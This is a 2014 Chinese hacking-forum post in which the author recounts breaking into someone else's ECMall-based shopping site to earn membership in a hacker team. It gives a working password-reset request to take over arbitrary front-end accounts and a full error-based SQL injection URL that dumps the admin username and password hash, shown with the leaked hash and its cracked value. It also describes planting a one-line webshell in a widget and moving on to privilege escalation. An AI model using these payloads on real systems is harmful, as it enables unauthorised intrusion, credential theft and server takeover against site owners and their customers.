##########################################
# Title :记一次日站(08sec申请转正帖)
# Time : 2014年5月3日
# Team : 08sec team
# Author : C4r1st
# 首发 : 08安全小组
#######################################
这只是记录一个渗透的过程
目标站是一个购物商场
得知信息:为ecmall系统 非管理员本人运营
Ecmll不用社工了,直接日就好了,exp一堆、
好吧。现在就开始把、
Xss:wooyun-2014-052345
偏麻烦额:
注入:wooyun-2014-052187
这个可以用,但是要申请店铺。
但是尼玛的,要审核啊、
换一个。
注入:wooyun-2014-052124
TM的还是要开店。。。。
其他的漏洞都老了。
既然不能给审核,那么还是要去社吗?
或者xss?
这个时候,基督给我了一个EXP,说是最新的。
可以修改前台的任意用户的密码、
我就在想,我是要日后台,前台有用吗?
这个时候基督大大告诉我:你TM不就是ecmall注入需要店铺吗?你可以任意修改一个前台开店的试试啊、
这句话一出,我脑子迸发了。
是啊。这就去试试、
访问:index.php?app=find_password&act=set_password&id=1
POST提交new_password=123456&confirm_password=123456
第一我先获取一个商铺ID
那么就利用吧。
修改成功了。
现在我登录一次试试
成功登录,这个号是已经有旺铺的
在利用之前的exp提交一次注入一下管理员试试、
EXP:[AppleScript] 纯文本查看 复制代码 index.php?app=my_goods&act=brand_list&order=asc&sort=1 and (select user_name from ecm_member where user_id=1 union select 1 from (select count(*),concat(floor(rand(0)*2),(select concat(user_name,password) from ecm_member limit 0,1))a from information_schema.tables group by a)b)%23
爆出来了、
1admin888e10adc3949ba59abbe56e057f20f883e
帐号:admin888 密码32为加密e10adc3949ba59abbe56e057f20f883e
解密后为123456
后台登录
Ecmall的getshell我是知道的
在挂件的位置。编辑写一句话、
找一个挂件,编辑脚本,写一句话
保存,连接之。
接下来。就是提权了、
很多人肯定想问,为什么不知道直接改管理密码呢?我改了。但是我TM不知道管理帐号啊~~~
因为我提权比较差,所以求进入08团队学习交流,学习更过的过程和方法。
这里我非常感谢基督大大(情节需要,请勿模仿)
新建 Microsoft Word 文档.doc
(894.5 KB, 下载次数: 11)
| 
发表于 2014-5-3 14:27:06
